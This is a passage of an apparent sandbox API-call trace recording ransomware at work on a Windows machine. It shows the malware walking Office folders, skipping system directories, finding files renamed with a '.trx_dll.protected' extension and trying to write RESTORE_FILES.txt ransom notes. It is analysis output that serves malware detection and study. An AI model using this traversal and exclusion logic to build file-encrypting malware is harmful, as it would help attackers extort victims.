returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.protected") returned 86 [0093.210] StrStrIW (lpFirst="MSOINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.protected") returned 85 [0093.210] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", 
lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.210] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.210] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.protected") returned 84 [0093.210] StrStrIW (lpFirst="ONINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.210] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.210] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.210] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="ONINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.protected") returned 85 [0093.211] StrStrIW (lpFirst="ONINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.211] lstrcmpiW 
(lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.protected") returned 86 [0093.211] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll.protected") returned 87 [0093.211] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="Program Files 
(x86)") returned -1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.211] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.211] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll.protected") returned 85 [0093.211] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.211] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.211] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.protected") returned 84 [0093.212] StrStrIW (lpFirst="PPINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned -1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", 
lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PPINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.protected") returned 85 [0093.212] StrStrIW (lpFirst="PPINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.protected") returned 86 [0093.212] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.212] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW 
(lpString1="PUB6INTL.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.212] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.protected") returned 87 [0093.212] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.212] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Windows") returned -1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.212] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.protected") returned 87 [0093.213] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt") returned 73 [0093.213] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.213] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="SGRES.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.protected") returned 83 [0093.213] StrStrIW (lpFirst="SGRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="STINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned -1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.protected") returned 84 [0093.213] StrStrIW (lpFirst="STINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.213] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.213] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.protected") returned 86 [0093.213] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="Windows") returned -1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.214] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll.protected") returned 85 [0093.214] StrStrIW (lpFirst="VISINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="Windows") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.214] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll.protected") returned 84 [0093.214] StrStrIW (lpFirst="WWINTL.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.214] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="Windows") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.214] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.215] lstrcmpiW (lpString1="WWINTL.REST.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.215] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.protected") returned 85 [0093.215] 
StrStrIW (lpFirst="WWINTL.REST.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.215] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="Windows") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.215] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.protected") returned 86 [0093.215] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.215] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="Windows") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="Program Files") returned 1 [0093.215] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.216] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.216] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.protected") returned 87 [0093.216] StrStrIW (lpFirst="XLINTL32.REST.trx_dll.protected", lpSrch=".protected") 
returned=".protected" [0093.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="Windows") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="Program Files") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="Program Files (x86)") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="$Recycle.bin") returned 1 [0093.216] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll.protected", lpString2="System Volume Information") returned 1 [0093.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.protected") returned 86 [0093.216] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll.protected", lpSrch=".protected") returned=".protected" [0093.216] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.216] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.216] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt") returned 73 [0093.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.216] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.216] lstrcmpiW 
(lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.216] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.216] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt") returned 68 [0093.216] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.216] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.216] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.216] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.217] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt") returned 68 [0093.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.218] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.218] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.218] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\RESTORE_FILES.txt") returned 57 [0093.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\RESTORE_FILES.txt" (normalized: "c:\\users\\all 
users\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.219] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files") returned -1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files (x86)") returned -1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$Recycle.bin") returned 1 [0093.219] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="System Volume Information") returned -1 [0093.219] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 65 [0093.219] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0093.219] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0093.219] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned 67 [0093.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.219] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.219] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.219] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.220] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.220] lstrcmpiW (lpString1=".", lpString2="System Volume Information") 
returned -1 [0093.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\.") returned 67 [0093.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.220] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.220] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.220] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.220] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.220] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.220] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.220] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\..") returned 68 [0093.220] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.220] lstrcmpW (lpString1="..", 